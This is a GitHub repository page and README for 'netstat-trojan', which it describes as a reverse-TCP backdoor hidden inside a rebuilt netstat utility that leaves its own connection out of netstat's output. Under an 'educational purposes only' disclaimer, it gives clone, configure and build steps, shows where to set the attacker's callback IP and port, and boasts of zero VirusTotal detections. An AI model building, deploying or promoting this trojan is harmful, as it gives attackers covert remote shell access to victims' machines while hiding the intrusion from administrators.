Skip to content

reverse-TCP backdoor disguised within the netstat utility. It's designed to automatically exclude itself from the netstat output. (educational purposes only)

License

Notifications You must be signed in to change notification settings

Drew-Alleman/netstat-trojan

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

            /********************************************************************\
           *                           DISCLAIMER:                            *
           *                                                                  *
           *  This program is for educational purposes only. Usage signifies  *
           *  understanding of risks. Usage on unauthorized systems is        *
           *  prohibited.                                                     *
           *                                                                  *
           *  - Use only with proper authorization. Unauthorized use is       *
           *    strictly prohibited.                                          *
           *                                                                  *
           *  - The creator assumes no liability for damages or legal         *
           *    consequences caused by this program.                          *
           *                                                                  *
           *  - Ensure compliance with applicable laws and regulations.       *
           *                                                                  *
           *  Use responsibly, ethically, and respect others' privacy and     *
           *  security.                                                       *
          \********************************************************************/

Code Review

Guide

netstat-trojan

netstat-trojan is a reverse-TCP backdoor disguised within the netstat utility. It's designed to automatically exclude itself from the netstat output.

VIRUS TOTAL RESULTS 0/63

Setup

  1. Clone the repository:
    git clone https://github.com/Drew-Alleman/netstat-trojan/
  2. Navigate to the cloned directory:
    cd netstat-trojan/
  3. Initialize the configuration scripts:
    ./autogen.sh
  4. Run the configuration:
    ./configure

Configuration Process

To configure the Netstat-Trojan to suit your specific needs, you will need to modify the netstat.c file:

  1. Open netstat.c in your preferred text editor. For example, using vim:

    drew@ubuntu-desktop:~/Projects/netstat-trojan$ vim src/netstat.c
  2. Locate and modify the following settings:

    • Port Configuration: Define the port to host the backdoor.
      #define PORT 44566
    • Server IP Configuration: Set the attacking IP address or the server address that the backdoor will connect to.
      #define SERVER_IP "192.168.0.87"

Ensure that you replace PORT and SERVER_IP with the values that align with your desired configuration.

Building

Once all the steps above are complete simply run make and the netstat binary will appear here: /netstat-trojan/src/

About

reverse-TCP backdoor disguised within the netstat utility. It's designed to automatically exclude itself from the netstat output. (educational purposes only)

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 96.6%
  • Makefile 2.1%
  • M4 1.2%
  • Shell 0.1%